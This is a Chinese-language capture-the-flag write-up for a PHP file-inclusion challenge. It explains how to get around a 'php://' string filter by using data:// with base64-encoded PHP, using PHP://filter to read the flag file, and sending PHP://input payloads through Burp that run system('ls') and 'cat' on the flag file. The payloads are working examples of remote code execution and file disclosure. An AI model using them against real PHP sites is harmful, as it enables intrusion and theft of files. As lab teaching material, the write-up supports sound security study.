php文件包含题

启动场景

进行代码审计：

对get类型参数进行循环过滤字符串'php://'，所以考虑其他伪协议，伪协议详见PHP伪协议详解_Snakin_ya的博客-CSDN博客

show_source() 函数

str_replace() 函数

strstr() 函数 

方法一  使用data协议

data://伪协议是数据流封装器，传递相应格式的数据。 通常可以用来执行PHP代码

经过测试官方文档上存在一处问题，经过测试PHP版本5.2，5.3，5.5，7.0；data:// 协议是是受限于allow_url_fopen的，官方文档上给出的是NO，所以要使用data://协议需要满足双on条件

PHP.ini：

data://协议必须双在on才能正常使用；

allow_url_fopen ：on

allow_url_include：on

用法：

data://text/plain,

data://text/plain;base64,

由于file://协议用于本地系统，所以考虑用data://协议

1.构造payload：

page=data://text/plain;base64,<?php system("ls")?>  （base64加密后的值）注意这里ls用双引号

 

即：data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4= 

 2.读取flag所在文件

?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php

 

 3.使用base64解码，得到flag

 方法二  运用php://input

php://input是个可以访问请求的原始数据的只读流。POST请求的情况下，最好使用php://input来代替$HTTP_RAW_POST_DATA，因为它不依赖于特定的php.ini指令。而且，这样的情况下$HTTP_RAW_POST_DATA默认没有填充，比激活always_populate_raw_post_data潜在需要更少的内存。enctype="multipart/form-data"的时候php://input是无效的。

1、php://input可以读取http entity body中指定长度的值，由Content-Length指定长度，不管是POST方式或者GET方法提交过来的数据。但是，一般GET方法提交数据时，http request entity body部分都为空。

2、php://input与$HTTP_RAW_POST_DATA读取的数据是一样的，都只读取Content-Type不为multipart/form-data的数据
 

1.访问PHP://input

构造payload：?page=PHP://input

2.使用bp抓包，send to repeater

输入<?php system('ls');?> ，这是php代码，ls是linux命令

 查询到文件名

3，flag应该就在fl4gisisish3r3.php文件里面

输入 <?php system('cat fl4gisisish3r3.php');?>，打开这个文件

得到flag